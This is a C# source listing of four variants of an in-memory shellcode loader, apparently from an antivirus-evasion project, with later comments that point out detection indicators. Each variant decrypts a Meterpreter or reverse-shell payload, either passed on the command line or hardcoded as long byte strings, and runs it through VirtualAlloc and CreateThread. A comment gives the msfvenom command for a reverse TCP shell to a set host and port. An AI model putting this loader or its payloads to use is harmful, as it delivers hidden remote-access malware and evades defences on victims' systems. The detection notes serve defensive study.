/// <summary>
        /// Entry point of an in-memory loader: it takes an encrypted Meterpreter payload,
        /// decrypts it with a key embedded in the binary and runs the result inside this process.
        /// Publisher and Author: Damon mohammadbagher
        /// Email :  [email protected]
        /// Step 1 : the Msfvenom payload is encrypted beforehand with the EncryptMaker tool
        /// Step 2 : the encrypted payload is either hardcoded in the value "Payload_Encrypted"
        /// or passed to the program as a command prompt argument
        /// For more information visit this link
        /// link : https://www.linkedin.com/pulse/bypass-all-anti-viruses-encrypted-payloads-c-damon-mohammadbagher
        ///
        /// Analysis notes: the file on disk holds only the key and (optionally) ciphertext, so the
        /// decrypted bytes exist only in memory. What remains observable at run time is the
        /// PAGE_EXECUTE_READWRITE allocation, the copy into it, and a thread whose start address is
        /// that allocation. When the payload is passed as an argument, it also appears on the
        /// process command line.
        /// </summary>
        /// <param name="args">args[0], when used, is the encrypted payload as comma-separated decimal byte values.</param>
        static void Main(string[] args)
        {
            string Payload_Encrypted;

            // NOTE(review): when no arguments are given the runtime normally passes an empty
            // array rather than null, so this test does not distinguish "argument supplied" from
            // "no argument" and the hardcoded fallback in the else branch is then not reached.
            if (args != null)
            {
                Payload_Encrypted = args[0].ToString();
            }
            else
            {
                Payload_Encrypted = "88,136,167";
            }
            // Split on ',' and parse every token as a decimal byte value; Convert.ToByte throws
            // on text that is not a number in the byte range.
            string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
            byte[]   _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
            for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
            {
                byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
                _X_to_Bytes[i] = current;
            }
            // Decryption key compiled into the binary; the byte sequence is a usable static indicator.
            byte[] KEY            = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
            // Decrypt is defined outside this listing; the algorithm it applies is not visible here.
            byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);
            // The message is printed before anything has been executed.
            Console.WriteLine("Bingo Meterpreter session ;)");
            // Requests a region sized to the decrypted payload with PAGE_EXECUTE_READWRITE protection,
            // i.e. writable and executable at the same time. VirtualAlloc, MEM_COMMIT and
            // PAGE_EXECUTE_READWRITE are declared outside this listing (presumably kernel32 P/Invoke
            // bindings - confirm). The return value is not checked for failure.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)Finall_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

            // Copies the decrypted bytes from the managed array into the allocated region.
            Marshal.Copy(Finall_Payload, 0, (IntPtr)(funcAddr), Finall_Payload.Length);
            IntPtr hThread  = IntPtr.Zero;
            UInt32 threadId = 0;
            IntPtr pinfo    = IntPtr.Zero;

            // Starts a thread whose entry point is the region written above, then blocks on the
            // thread handle with a timeout of 0xFFFFFFFF (no timeout), keeping the process alive.
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        /// <summary>
        /// Entry point of an in-memory loader that receives both the decryption key and the
        /// encrypted payload on the command line, decrypts the payload and runs the result
        /// inside this process.
        ///
        /// Analysis notes: nothing payload-specific is stored in the binary, but key and ciphertext
        /// are both present on the process command line and the key is echoed to the console, so
        /// process-creation logging with command-line capture records everything needed to recover
        /// the plaintext. The run-time behaviour is a PAGE_EXECUTE_READWRITE allocation, a copy
        /// into it, and a thread started at that address.
        /// </summary>
        /// <param name="args">
        /// args[0]: the key as space-separated hexadecimal byte values;
        /// args[1]: the encrypted payload as space-separated decimal byte values.
        /// Neither the argument count nor the token format is validated before use.
        /// </param>
        static void Main(string[] args)
        {
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkGray;
            Console.WriteLine("Payload Decryption tool by arguments.");
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.WriteLine();
            string Payload_Encrypted;

            // args[0] is indexed without a length check; a missing argument ends in an exception.
            string[] Input_Keys = args[0].Split(' ');
            byte[]   xKey       = new byte[Input_Keys.Length];
            Console.Write("[!] Decryption KEY: ");
            Console.ForegroundColor = ConsoleColor.Yellow;
            // Parse each key token as a base-16 byte and echo it to the console as two hex digits.
            for (int i = 0; i < Input_Keys.Length; i++)
            {
                xKey[i] = Convert.ToByte(Input_Keys[i], 16);
                Console.Write(xKey[i].ToString("x2") + " ");
            }
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            // Parse the payload argument: space-separated tokens, each read as a decimal byte.
            Payload_Encrypted = args[1].ToString();
            string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');
            byte[]   _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
            for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
            {
                byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
                _X_to_Bytes[i] = current;
            }
            try
            {
                Console.WriteLine();
                Console.WriteLine("[!] Loading Encrypted Payload in Memory.");
                Console.ForegroundColor = ConsoleColor.Green;
                // Decrypt is defined outside this listing; the algorithm it applies is not visible here.
                byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);
                Console.WriteLine("[>] Decrypting Payload by KEY in Memory.");
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine();
                Console.WriteLine();
                // Printed before the allocation and thread creation below have run.
                Console.WriteLine("FUMA: All is ok!");
                // Region sized to the decrypted payload, requested as writable and executable at once.
                // VirtualAlloc, MEM_COMMIT and PAGE_EXECUTE_READWRITE are declared outside this listing
                // (presumably kernel32 P/Invoke bindings - confirm). The result is not checked.
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                // Copy the decrypted bytes into that region.
                Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);
                IntPtr hThread  = IntPtr.Zero;
                UInt32 threadId = 0;
                IntPtr pinfo    = IntPtr.Zero;
                // Start a thread at the copied bytes and wait on it with no timeout (0xffffffff).
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xffffffff);
            }
            catch (Exception)
            {
                // Rethrows unchanged; the try/catch adds no handling of its own.
                throw;
            }
        }
        /// <summary>
        /// Entry point of an in-memory loader with both the key and the encrypted payload compiled
        /// in: it decrypts the embedded payload and runs the result inside this process.
        ///
        /// Analysis notes: because key and ciphertext are both stored in the binary, the encryption
        /// gives no secrecy against analysis; either byte sequence can serve as a static indicator
        /// and the plaintext can be recovered offline. The console text calls the key an "RC4 key",
        /// but Decrypt itself is not part of this listing. The run-time behaviour is a
        /// PAGE_EXECUTE_READWRITE allocation, a copy into it, and a thread started at that address.
        /// </summary>
        /// <param name="args">Not read by this method.</param>
        static void Main(string[] args)
        {
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkGray;
            Console.WriteLine("Full hardcoded payload decryption tool");
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.WriteLine();
            Console.WriteLine("[!] Using hardcoded RC4 key.");
            /// Text to Hex: 123123123123 = 31 32 33 31 32 33 31 32 33 31 32 33
            string Payload_Encrypted;

            // The key is the ASCII text "123123123123", as the note above spells out.
            byte[] xKey = { 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33 };
            // Author's note on how the plaintext payload was generated before encryption:
            /// msfvenom --platform windows -p windows/x64/shell/reverse_tcp lhost=192.168.237.129 lport=4443 -f csharp
            Payload_Encrypted = "175 184 60 102 21 156 200 251 37 99 66 219 63 75 242 224 5 196 232 243 7 50 212 4 150 179 11 237 65 198 73 160 250 123 163 200 148 88 54 115 198 95 33 32 63 127 76 188 66 207 8 179 210 202 16 114 73 26 49 163 195 164 251 234 131 139 81 203 159 14 184 196 75 52 202 135 49 13 84 104 176 170 158 251 120 166 179 138 67 221 166 5 214 42 82 105 83 68 198 248 245 99 76 45 167 123 108 47 23 133 63 102 228 242 157 39 77 210 33 117 175 227 7 51 96 238 171 149 170 46 165 109 49 166 209 34 36 211 32 91 161 174 57 254 38 198 51 101 122 67 31 240 55 91 141 121 234 21 56 130 88 85 48 173 104 224 64 174 25 20 36 251 64 5 68 36 59 221 140 73 167 215 210 233 104 243 25 12 221 108 64 104 25 110 216 152 135 64 16 99 92 77 222 251 249 104 180 240 50 169 118 113 215 135 155 246 251 69 212 37 19 21 127 150 0 71 37 5 10 1 105 45 191 84 224 125 160 231 73 230 170 116 22 152 204 179 234 88 237 67 49 85 113 36 92 110 98 124 110 20 71 230 45 91 163 71 57 148 117 22 7 12 99 43 39 73 212 247 29 69 250 141 23 72 130 171 131 247 232 131 20 231 38 94 121 143 232 176 122 109 141 140 200 84 179 81 101 12 47 177 115 129 234 104 133 15 97 215 72 191 182 220 26 107 171 77 96 30 252 212 201 217 139 49 31 41 237 131 26 36 163 190 167 233 91 10 9 186 38 226 10 254 13 201 34 45 196 126 24 180 58 250 221 222 156 119 170 38 36 149 67 186 186 217 216 120 158 17 159 6 7 162 31 14 228 81 80 72 204 15 13 50 49 209 147 225 1 219 237 112 236 37 147 225 55 37 104 217 128 132 38 31 177 71 106 225 228 195 164 244 9 126 245 13 141 251 227 11 178 201 216 56 19 159 49 132 201 111 248 97 148 57 74 109 252 177 95 199 51 57 69 246 55 6 43 131 43 44 90 165 90 52 10 228 30 108 180 217 190 31 204 208 228 216 1 119 123 43 94 67 165 109 151 154 131 111 104 15 253 145 42 42 229 119 158 199 249 42 182 27 224 88 118 9 83 125 178 130 250 153";
            // Split the literal on spaces and parse every token as a decimal byte value.
            string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');
            byte[]   _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
            for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
            {
                byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
                _X_to_Bytes[i] = current;
            }
            try
            {
                Console.WriteLine();
                Console.WriteLine("[!] Loading encrypted payload in Memory Done.");
                Console.ForegroundColor = ConsoleColor.Green;
                // Decrypt is defined outside this listing; the algorithm it applies is not visible here.
                byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);
                Console.WriteLine("[>] Decrypting `payload by KEY in Memory Done.");
                Console.ForegroundColor = ConsoleColor.DarkYellow;
                Console.WriteLine();
                Console.WriteLine();
                // Printed before the allocation and thread creation below have run.
                Console.WriteLine("Reverse session done!");
                // Region sized to the decrypted payload, requested as writable and executable at once.
                // VirtualAlloc, MEM_COMMIT and PAGE_EXECUTE_READWRITE are declared outside this listing
                // (presumably kernel32 P/Invoke bindings - confirm). The result is not checked.
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                // Copy the decrypted bytes into that region.
                Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);
                IntPtr hThread  = IntPtr.Zero;
                UInt32 threadId = 0;
                IntPtr pinfo    = IntPtr.Zero;
                // Start a thread at the copied bytes and wait on it with no timeout (0xffffffff).
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xffffffff);
            }
            catch (Exception)
            {
                // Rethrows unchanged; the try/catch adds no handling of its own.
                throw;
            }
        }
        /// <summary>
        /// Entry point of an in-memory loader with a compiled-in key and a compiled-in encrypted
        /// Meterpreter payload: it decrypts the embedded payload and runs the result inside this
        /// process. The argument-driven variant (key and payload taken from the command line) is
        /// left in as commented-out code.
        ///
        /// Analysis notes: key and ciphertext are both stored in the binary, so either byte sequence
        /// can serve as a static indicator and the plaintext can be recovered offline. The banner
        /// says RC4 is used, but Decrypt itself is not part of this listing. The run-time behaviour
        /// is a PAGE_EXECUTE_READWRITE allocation, a copy into it, and a thread started at that
        /// address.
        /// </summary>
        /// <param name="args">Not read by the active code; only the commented-out lines refer to it.</param>
        static void Main(string[] args)
        {
            Console.WriteLine();
            Console.ForegroundColor = ConsoleColor.DarkGray;
            Console.WriteLine("Payload Decryption tool for Meterpreter Payloads ");
            Console.ForegroundColor = ConsoleColor.Gray;
            Console.WriteLine("Published by Damon Mohammadbagher  2016-2017");
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            Console.WriteLine();
            Console.WriteLine("[!] Using RC4 Decryption for your Payload By KEY.");
            string Payload_Encrypted;

            // Decryption key compiled into the binary.
            byte[] xKey = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00,
                            0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };

            //string[] Input_Keys = args[0].Split(' ');
            //byte[] xKey = new byte[Input_Keys.Length];

            // The label is written, but the loop that would print the key bytes is commented out,
            // so no key value follows it on the console.
            Console.Write("[!] Decryption KEY is : ");
            Console.ForegroundColor = ConsoleColor.Yellow;
            /// Converting String to Byte for KEY by first Argument
            //for (int i = 0; i < Input_Keys.Length; i++)
            //{
            //    xKey[i] = Convert.ToByte(Input_Keys[i], 16);
            //    Console.Write(xKey[i].ToString("x2") + " ");
            //}
            Console.ForegroundColor = ConsoleColor.DarkGreen;
            /// Converting String to Byte for Encrypted Meterpreter Payload by Second Argument

            //Payload_Encrypted = args[0].ToString();
            Payload_Encrypted = "0 84 37 71 69 109 37 60 21 235 228 108 17 204 176 36 198 93 237 156 145 184 238 1 181 165 137 167 87 222 160 187 124 92 202 24 168 213 233 136 47 91 129 7 14 9 103 63 95 141 211 34 201 140 241 165 213 137 208 219 133 54 49 0 118 140 100 199 158 10 107 116 107 224 90 214 159 208 228 26 231 73 26 151 85 112 83 140 229 51 128 197 75 241 140 169 228 9 68 236 172 198 13 57 86 126 136 198 101 115 100 168 67 172 1 23 246 143 214 151 253 13 113 69 215 169 12 226 190 215 247 224 137 68 123 43 11 12 207 194 2 0 143 251 187 15 171 245 24 105 3 68 10 81 252 63 250 150 219 229 147 55 50 11 237 89 185 220 100 248 20 180 42 175 246 34 27 1 131 203 175 49 104 33 218 144 110 193 189 206 206 204 62 138 78 2 102 75 130 176 183 93 184 252 9 136 155 117 228 39 177 96 169 181 89 233 114 114 29 56 223 163 247 33 145 203 41 151 165 242 162 133 149 123 84 169 156 172 75 103 144 63 254 1 116 121 152 182 15 109 48 242 80 94 76 100 131 28 114 3 119 227 147 76 105 132 185 70 93 236 253 186 193 177 67 202 216 136 241 19 146 16 146 184 10 41 206 30 4 95 176 204 190 95 71 7 146 160 30 113 50 249 159 156 194 14 53 130 12 252 44 159 214 216 139 81 51 145 166 5 194 165 155 160 230 79 185 162 170 103 2 110 95 48 207 207 215 245 167 106 133 70 28 238 114 70 20 7 9 173 132 7 76 226 242 193 123 148 140 199 238 178 109 188 235 52 137 157 233 228 81 21 238 197 38 148 121 77 139 229 155 23 205 66 195 75 35 170 53 81 201 168 212 241 100 156 110 97 185 225 216 106 6 4 171 46 150 154 186 122 208 171 210 33 38 188 129 153 108 126 196 85 178 29 210 128 120 137 73 176 239 6 176 142 238 215 213 176 182 116 152 48 133 217 212 138 97 4 33 165 45 73 54 254 153 125 218 97 156 185 191 100 229 210 112 99 221 159 198 220 211 134 120 15 116 52 150 214 214 8 175 162 109 236 32 48 109 20 106 48 132 102 114 73 23 254 207 38 139 14 109 223 99 164 53 213 52 15 33 211";

            // Split the literal on spaces and parse every token as a decimal byte value.
            string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');

            byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];

            for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
            {
                byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
                _X_to_Bytes[i] = current;
            }
            try
            {
                Console.WriteLine();
                Console.WriteLine("[!] Loading Encrypted Meterprter Payload in Memory Done.");
                Console.ForegroundColor = ConsoleColor.Green;

                // Decrypt is defined outside this listing; the algorithm it applies is not visible here.
                byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);

                Console.WriteLine("[>] Decrypting Meterprter Payload by KEY in Memory Done.");
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine();
                Console.WriteLine();
                // Printed before the allocation and thread creation below have run.
                Console.WriteLine("Bingo Meterpreter session by Encrypted Payload ;)");

                // Region sized to the decrypted payload, requested as writable and executable at once.
                // VirtualAlloc, MEM_COMMIT and PAGE_EXECUTE_READWRITE are declared outside this listing
                // (presumably kernel32 P/Invoke bindings - confirm). The result is not checked.
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                // Copy the decrypted bytes into that region.
                Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);

                IntPtr hThread  = IntPtr.Zero;
                UInt32 threadId = 0;
                IntPtr pinfo    = IntPtr.Zero;

                // Start a thread at the copied bytes and wait on it with no timeout (0xffffffff).
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xffffffff);
            }
            catch (Exception)
            {
                // Rethrows unchanged; the try/catch adds no handling of its own.
                throw;
            }
        }